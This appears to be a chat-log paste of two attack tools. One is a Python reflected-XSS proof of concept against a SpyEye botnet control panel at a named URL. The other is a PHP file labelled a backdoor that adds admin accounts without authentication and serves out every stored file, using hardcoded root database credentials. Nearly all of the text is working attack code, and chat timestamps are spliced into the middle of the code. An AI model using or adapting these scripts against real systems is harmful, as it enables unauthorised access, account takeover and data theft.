root@C0D34O4 :~#, [16.04.17 13:07]# SpyEye version ? reflected XSS POC# Xart

1. root@C0D34O4 :~#, [16.04.17 13:07]
2. # SpyEye version ? reflected XSS POC
3. # Xartrick
4. # Xylitol
5.  
6. import urllib
7. import urllib2
8.  
9. # Configuration ...
10.  
11. sPayload = '<script>alert(1);</script>'
12. sPanel = 'http://drookinabra.ru/adm/frmcp2/'
13. sURL = sPanel + 'mod_savecert.php?id=' + sPayload
14.  
15. # Exploitation
16.  
17. sPOST = {'host' : sPayload}
18. sData = urllib.urlencode(sPOST)
19. oURL = urllib2.Request(sURL, sData)
20. oResponse = urllib2.urlopen(oURL)
21. sPage = oResponse.read()
22.  
23. if (sPayload in sPage):
24. print("Exploitation works, the vulnerabily exists!")
25. else:
26. print("You are a bad hacker!")
27. Type: Backdoor
28.  
29. Author: Xylitol
30.  
31. <?php
32. // Xyl2k :þ
33. // Thanks to EsSandre for the additional help.
34.  
35. $MySQLI = array();
36.  
37. /* MySQLI ID */
38.  
39. $MySQLI['HOST'] = 'localhost';
40. $MySQLI['USER'] = 'root';
41. $MySQLI['PASS'] = 'toor';
42. $MySQLI['DB'] = 'maincp';
43.  
44. function str_error($error)
45. {
46. print '<p style="color:red;">'.htmlentities($error).'</p>';
47. }
48.  
49. function download_binary($path_file, $buf)
50. {
51. header("Pragma: public");
52. header("Expires: 0");
53. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
54. header("Cache-Control: private", false);
55. header("Content-Type: application/octet-stream");
56. header("Content-Disposition: attachment; filename=\"".basename($path_file)."\";" );
57.  
58. header("Content-Transfer-Encoding: binary");
59. header("Content-Length: ".strlen($buf));
60.  
61. echo $buf;
62. }
63.  
64. $mysqli = new mysqli($MySQLI['HOST'], $MySQLI['USER'], $MySQLI['PASS'], $MySQLI['DB']);
65.  
66. if (isset($_POST['register_submit']))
67. {
68. unset($_GET['id']);
69. if (isset($_POST['user']) && !is_array($_POST['user']) && !empty($_POST['user']))
70. {
71. if (isset($_POST['password']) && !is_array($_POST['password']) && !empty($_POST['password']))
72. {
73. if (trim($_POST['user']) == '' || trim($_POST['password']) == '')
74. str_error('An error has occurred');
75. else
76. {
77. $user = mysql_real_escape_string($_POST['user']);
78. $password = md5($_POST['password']);
79. $mysqli->query("INSERT INTO users_t VALUES('', '".$user."', '".$password."', '', '')");
80. echo '<p style="color:green;">User added successfully</p>';
81. }
82. }
83. else
84. str_error('An error has occurred');
85. }
86. else
87. str_error('An error has occurred');
88. }
89.  
90. if (mysqli_connect_errno())
91. die(str_error('MySQLI Connect : '.mysqli_connect_error()));
92.  
93. if (isset($_GET['id']) && !empty($_GET['id']) && !is_array($_GET['id']))
94. {
95. if (is_numeric($_GET['id']) && $_GET['id'] > 0)
96. {
97. $id = $_GET['id'];
98. $sql = $mysqli->query('SELECT fName, fCont FROM files_t WHERE fId=\''.$id.'\'');
99. if ($sql->num_rows)
100. {
101. $_sql = $sql->fetch_array(MYSQLI_ASSOC);
102. download_binary($_sql['fName'], $_sql['fCont']);
103. }
104. else
105. str_error('Invalid file');
106. }
107. else
108. str_error('Invalid file');
109. }
110. else
111. {
112. echo '<h3>Add an Admin Account</h3><br />
113. <form action="'.basename($_SERVER['PHP_SELF']).'" method="POST">
114. <label for="user">Username</label><br /><input name="user" type="text"/><br /><br />
115. <label for="user">Password</label><br /><input name="password" type="password"/><br /><br />
116. <input name="register_submit" value="Register" type="submit"/>
117. </form>';
118.  
119. root@C0D34O4 :~#, [16.04.17 13:07]
120. $sql = $mysqli->query('SELECT fId, fName, fCont FROM files_t');
121. if (!$sql)
122. die(str_error('MySQLI :: Query error : '.$mysqli->error));
123.  
124. echo "\n<h3>List of available file in database</h3><br />\n";
125.  
126. while($row = $sql->fetch_array(MYSQLI_ASSOC))
127. {
128. echo "<a href=\"".basename($_SERVER['PHP_SELF'])."?id=".$row['fId']."\">".htmlentities($row['fName'])."</a><br /><br />\n";
129. }
130. }
131. mysqli_close($mysqli);
132. ?>